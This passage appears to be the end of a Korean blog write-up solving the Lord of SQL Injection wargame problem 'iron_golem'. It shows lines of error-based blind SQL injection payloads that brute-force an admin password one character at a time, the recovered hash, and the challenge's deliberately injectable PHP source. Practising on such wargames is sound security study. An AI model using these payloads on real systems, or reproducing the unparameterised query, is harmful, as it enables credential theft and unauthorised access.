?pw='or id='admin' and if(right(left(pw,31),1)='1',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,31),1)='2',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,31),1)='3',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,31),1)='4',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,31),1)='5',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,31),1)='6',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,31),1)='7',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,31),1)='8',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,31),1)='9',(select 1 union select 2),1)%23
31번째 패스워드 :9
?pw='or id='admin' and if(right(left(pw,32),1)='0',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,32),1)='1',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,32),1)='2',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,32),1)='3',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,32),1)='4',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,32),1)='5',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,32),1)='6',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,32),1)='7',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,32),1)='8',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,32),1)='9',(select 1 union select 2),1)%23
?pw='or id='admin' and if(right(left(pw,32),1)='a',(select 1 union select 2),1)%23
32번째 패스워드 :a
pw :06b5a6c16e8830475f983cc3a825ee9aquery : select id from prob_iron_golem where id='admin' and pw='06b5a6c16e8830475f983cc3a825ee9a'
IRON_GOLEM Clear!
<?php
include "./config.php";
login_chk();
$db = dbconnect();
if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");
if(preg_match('/sleep|benchmark/i', $_GET[pw])) exit("HeHe");
$query = "select id from prob_iron_golem where id='admin' and pw='{$_GET[pw]}'";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if(mysqli_error($db)) exit(mysqli_error($db));
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$_GET[pw] = addslashes($_GET[pw]);
$query = "select pw from prob_iron_golem where id='admin' and pw='{$_GET[pw]}'";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("iron_golem");
highlight_file(__FILE__);
?>
'문제풀이 > Lord of SQL Injection' 카테고리의 다른 글
| [Lord Of SQL Injection] 23번(order by 활용★★★★★) (0) | 2022.02.14 |
|---|---|
| [Lord Of SQL Injection] 22번(error blind sql) (0) | 2022.02.13 |
| [Lord Of SQL Injection] 20번(%0a : 줄 바꾸기) (0) | 2022.02.09 |
| [Lord Of SQL Injection] 19번(추가해결방법) (0) | 2022.02.09 |
| [Lord Of SQL Injection] 19번(어렵다★★★) (0) | 2022.02.08 |
'문제풀이/Lord of SQL Injection' Related Articles
more
